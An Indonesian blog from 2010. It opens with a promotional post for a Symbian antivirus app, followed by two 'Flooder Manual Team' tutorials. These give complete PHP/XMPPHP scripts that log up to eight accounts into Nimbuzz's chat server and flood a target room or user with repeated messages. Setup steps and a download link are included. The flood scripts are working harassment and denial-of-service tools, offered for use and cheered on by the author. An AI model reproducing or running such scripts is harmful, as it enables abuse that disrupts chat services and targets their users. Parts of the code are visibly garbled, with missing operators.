Jumat, 30 April 2010

NetQin Mobile Anti-Virus Pro v.3.2.8







 NetQin Mobile Anti-Virus Pro v.3.2.8

NetQin Mobile Anti-Virus Pro v.3.2.8- Excellent perangkat lunak antivirus untuk smartphone Anda. NetQin Anti-Virus Pro adalah sempurna untuk memotong dan ancaman virus - saat memindai sedikit lebih dari Kaspersky. NetQin dapat menghapus file yang terinfeksi di dalam distribusi-sis, tanpa menyentuh sisanya. Bila Anda membuka file yang terinfeksi, serta ketika menerima pesan positif, sebuah kotak dialog dengan peringatan dan permintaan penghapusan.
Pilihan memungkinkan Anda untuk mengatur tingkat perlindungan dan auto-run monitor anti-virus.
NetQin Fitur Anti-Virus Pro Antivirus:
"Update database antivirus secara manual, dan jadwal keluar, langsung dari program;
"Pemindaian dan SIS SISX paket untuk kehadiran objek vredonostnyh;
"Memeriksa ZIP, RAR dan paket JAR keberadaan benda vredonostnyh
"Kemampuan untuk memilih scan daerah;
"Crawling sesuai jadwal;
"Kinerja tinggi;
Ovmestima dengan smartphone berbasis Symbian 9.1,9.2,9.3,9.4
Apakah Anda puas dengan program ini? Ya Tidak
Bagaimana untuk menandatangani sebuah program?
Apa yang memberikan "Kesalahan dalam sertifikat" atau
"Sertifikat telah kedaluwarsa"?


NetQin Mobile Anti-Virus Pro v.3.2.8


Image and video hosting by TinyPic

Senin, 05 April 2010

WebFlood Multi ID in Room (Part 2)

 laugh Nich dia waaktunya buat posting lagi................... dance dance dance

Kali ini saya akan membangi script mengenai WebFlood Multi ID di Room...........  wink
 Script ini kerjanya agak mirip ma zombie yakni multi ID bedanya pada script ini untuk memasukkan jid mesti manual n jumlah pasukannya 5....... tpi bagi yang ngrti mslh script PHP pasti dah tw kan bagian mana yang mesti di edit biar gag perlu nulis-nulis jid pasukan n pasword...... laugh laugh laugh 
    Owh iya sedikit tambahan sebelum aku bagi scriptnya yakni WebFlood ini sangat jauh kekuatannya di bandingkan aplikasi-aplikasi sekelas zombie... laugh jadi maklum aja kalau banyak orang lebih suka menggunakan aplikasi tersebut........................  wink


Ni lansung aja saya posting acriptnya:
Code:
<?phpinclude 'XMPPHP/Log.php';
include 
'XMPPHP/XMPP.php';

if (!isset(
$_POST["Submit"]))
{

echo 
"<form id='pv1' name='send' method='post' action='$_SERVER[PHP_SELF]'>";
echo 
"<table width='410' border='0' cellspacing='1' cellpadding='1'>";
echo 
"<tr>";
echo 
"<td width='50'>Username1</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username' type='text' id='username'/></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username2</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username1' type='text' id='username1' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username3</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username2' type='text' id='username2' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username4</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username3' type='text' id='username3' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username5</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username4' type='text' id='username4' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>Password</td>";
echo 
"<td>:</td>";
echo 
"<td><input name='password' type='password' id='password' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>Target</td>";
echo 
"<td>:</td>";
echo 
"<td><input name='target' type='text' id='target' value='Markas_Besar_FMT' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>Text</td>";
echo 
"<td>:</td>";
echo 
"<td><textarea name='text' cols='30' rows='4' id='textplud'></textarea></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>&nbsp;</td>";
echo 
"<td>&nbsp;</td>";
echo 
"<td><input type='hidden' name='mode' value='enter1' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>&nbsp;</td>";
echo 
"<td>&nbsp;</td>";
echo 
"<td><input type='submit' name='Submit' value='Submit' /></td>";
echo 
"</tr>";
echo 
"</table>";
echo 
"</form>";
}
else
{
$user$_POST["username"];$user1$_POST["username1"];$user2$_POST["username2"];$user3$_POST["username3"];$user4$_POST["username4"];$password$_POST["password"];$resource='Flooder Manual Team';$host='openfire.nimbuzz.com';$port='5222';$server='nimbuzz.com';$target=$_POST["target"];$to="$target@conference.nimbuzz.com";$body=$_POST["text"];
$conn = new XMPPHP_XMPP($host$port$user$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn1 = new XMPPHP_XMPP($host$port$user1$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn2 = new XMPPHP_XMPP($host$port$user2$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn3 = new XMPPHP_XMPP($host$port$user3$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn4 = new XMPPHP_XMPP($host$port$user4$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);


try {
    
$conn->connect();$conn1->connect();
 
$conn2->connect();$conn3->connect();$conn4->connect();
    
$conn->processUntil('session_start');
 
$conn1->processUntil('session_start');$conn2->processUntil('session_start');
 
$conn3->processUntil('session_start');$conn4->processUntil('session_start'); for ($i=1;$i<=1;$i++){
    
$conn->presence(NULL"bot""$to/$user""available");$conn1->presence(NULL"bot""$to/$user1""available"); $conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat"); $conn2->presence(NULL"bot""$to/$user2""available");$conn3->presence(NULL"bot""$to/$user3""available"); $conn3->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn4->presence(NULL"bot""$to/$user4""available");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");

}
echo "flood room ke $to, berhasil :D............ reload this page to resend ur flood........ salam Flooder manual Team ;-)";
} catch(
XMPPHP_Exception $e) {
    die(
$e->getMessage());
}
}
?>

jangan lupa scriptnya di simpan dalam Format .PHP........

Owh iya buat yang pengen instant n gag perlu buat2 lagi silahkan download DISINI

buat cara penggunaannya silahkan baca di artikel sebelumnya...........  wink

owh iya terima kasih buat kang eliash yang dah berbagi ilmu mengenai webflood buat room di nimbuzzing.org dan juga sekali lagi special thank dah buat sahabat w yang dah ngajarin tentang WebFlood yakni KID_69
 fire fire thanks all........... keep enjoying with Flood........... excited excited



Nantikan Script-Script Selanjutnya................ semoga smuanya bisa bermanfaat.........





Sabtu, 03 April 2010

Webflood on local host (Multi id Flood PV) (part 1)

Read salam FMT,  cool fire

WebFlood pada nimbuzz sebenrya merupakan suatu yang tidak asing lagi terutama para flooder... dan saya yakin diantara pembaca sekalian ada yang jauh lebih mahir dari saya dalam masalah ini....  laugh laugh  n tujuan saya disin adalah untuk saling berbagi ilmu, disini saya sendiri termasuk newbie dalam masalah webflood........ wink wink


            Ok langsung aja kita k TKP untuk mempraktekkannya......... hal yg di butuhkan ialah : Read
  •    sebuah pc
  •    server local (bagi yang blum ngerti atau belum pnya silahkan gunakan Wamp server atau Xampp )



bagi yang sudah biasa menggunakan flood web silahkan buat sendiri file PHP nya seperti dibawah ini
Code:
<?phpinclude 'XMPPHP/Log.php';
include 
'XMPPHP/XMPP.php';

if (!isset(
$_POST["Submit"]))
{

echo 
"<form id='pv1' name='send' method='post' action='$_SERVER[PHP_SELF]'>";
echo 
"<table width='410' border='0' cellspacing='1' cellpadding='1'>";
echo 
"<tr>";
echo 
"<td width='50'>Username1</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username' type='text' id='username' value='pein521'/></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username2</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username1' type='text' id='username1' value='pein522'/></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username3</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username2' type='text' id='username2' value='pein523'/></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username4</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username3' type='text' id='username3' value='pein524'/></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username5</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username4' type='text' id='username4' value='pein525'/></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username6</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username5' type='text' id='username5' value='pein526'/></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username7</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username6' type='text' id='username6' value='pein527'/></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username8</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username7' type='text' id='username8' value='pein528'/></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>Password</td>";
echo 
"<td>:</td>";
echo 
"<td><input name='password' type='password' id='password' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>Target</td>";
echo 
"<td>:</td>";
echo 
"<td><input name='target' type='text' id='target' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>Text</td>";
echo 
"<td>:</td>";
echo 
"<td><textarea name='text' cols='30' rows='4' id='textplud'></textarea></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>&nbsp;</td>";
echo 
"<td>&nbsp;</td>";
echo 
"<td><input type='hidden' name='mode' value='enter1' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>&nbsp;</td>";
echo 
"<td>&nbsp;</td>";
echo 
"<td><input type='submit' name='Submit' value='Submit' /></td>";
echo 
"</tr>";
echo 
"</table>";
echo 
"</form>";
}
else
{
$user$_POST["username"];$user1$_POST["username1"];$user2$_POST["username2"];$user3$_POST["username3"];$user4$_POST["username4"];$user5$_POST["username5"];$user6$_POST["username6"];$user7$_POST["username7"];$password$_POST["password"];$resource='Flooder Manual Team';$host='openfire.nimbuzz.com';$port='5222';$server='nimbuzz.com';$target=$_POST["target"];$to="$target@nimbuzz.com";$body=$_POST["text"];$body1='-
:D--Flooder Manual Team-:D----
---
:D-Flooder Manual Team-:D--:D-
--
:D--:D-Flooder Manual Team-:D--
-
:D-Flooder Manual Team--:D-:D---
-Flooder Manual Team-
:D--:D--:D--
-
:D-Flooder Manual Team--:D--:D--
-
:D--Flooder Manual Team--:D--:D-
--
:D--Flooder Manual Team-:D---
--
:D--:D-Flooder Manual Team--:D-
--
:D-Flooder Manual Team-:D---:D-';$body2='Pein52........... :D
Pein52..:D.....:D.... :D
Pein52.:D......:D.... :D
Pein52:D....:D...:D.... :D
Pein52....:D....... :D
Pein52..:D.......:D.. :D
Pein52....:D....... :D
Pein52..:D......:D... :D
Pein52...:D........ :D
Pein52.:D......:D.... :D
Pein52....:D..:D..... :D'
;
$conn = new XMPPHP_XMPP($host$port$user$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn1 = new XMPPHP_XMPP($host$port$user1$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn2 = new XMPPHP_XMPP($host$port$user2$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn3 = new XMPPHP_XMPP($host$port$user3$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn4 = new XMPPHP_XMPP($host$port$user4$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn5 = new XMPPHP_XMPP($host$port$user5$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn6 = new XMPPHP_XMPP($host$port$user6$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn7 = new XMPPHP_XMPP($host$port$user7$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);


try {
    
$conn->connect();$conn1->connect();$conn2->connect();$conn3->connect();
 
$conn4->connect();$conn5->connect();$conn6->connect();$conn7->connect();
    
$conn->processUntil('session_start');$conn1->processUntil('session_start');$conn2->processUntil('session_start');$conn3->processUntil('session_start');
 
$conn4->processUntil('session_start');$conn5->processUntil('session_start');$conn6->processUntil('session_start');$conn7->processUntil('session_start'); for ($i=1;$i<=50;$i++){ $conn->message($to,$body,"chat");$conn1->message($to,$body,"chat");$conn2->message($to,$body,"chat");$conn3->message($to,$body,"chat");$conn4->message($to,$body,"chat");$conn5->message($to,$body,"chat");$conn6->message($to,$body,"chat");$conn7->message($to,$body,"chat");$conn->message($to,$body1,"chat");$conn1->message($to,$body2,"chat");$conn2->message($to,$body1,"chat");$conn3->message($to,$body2,"chat");$conn4->message($to,$body1,"chat");$conn5->message($to,$body2,"chat");$conn6->message($to,$body1,"chat");$conn7->message($to,$body2,"chat");
}
echo "flood pv ke $to, berhasil dikirim... ;-) salam Flooder Manual Team..........";
    
$conn->disconnect();
 
$conn1->disconnect();
 
$conn2->disconnect();
 
$conn3->disconnect();
 
$conn4->disconnect();
 
$conn5->disconnect();
 
$conn6->disconnect();
 
$conn7->disconnect();
} catch(
XMPPHP_Exception $e) {
    die(
$e->getMessage());
}
}
?>
kemudian di save dngn nama multipv.php
Berikut langkah-langkah penggunaanya.........

  • Save Flie yang udah di download tadi / file yang udah di buat dalam localhost  beserta berkas-berkas Flood webnya...
  • Buka Browser (tekadang beberapa pc hanya support menggunakan IE untuk masalah localhost..) dan ketikkan kode dengan format sbb: http://localhost/folder berkas web flood/nama file flood kamu .php (contoh: http://localhost/xampp/multipv.php) kemudian enter. Nah jika langkah-langkah di atas benar mka akan keluar Form dengan 8 usermane buat login, 1 tempat pasword dan 1 form buat text flood............
  • setelah semua kalian isi kemudian tekan tombol submit............. n  fire fire fire liat aja ndri hasilnya.....  dance dance
demikian sedikit ilmu yang dapat saya bagi kepada kawan-kawan Flooder Manual Team.... smile smile
  sekali lagi disini kita sama-sama belajar jadi jika ada kesalahan atau kekurangan mohon kritik dan saran yang bijak dari kawan-kawan  wink wink
dan yang terakhir dari saya adalah special thanks buat KID_69 yang dah mw berbagi ilmu kepada saya  laugh laugh laugh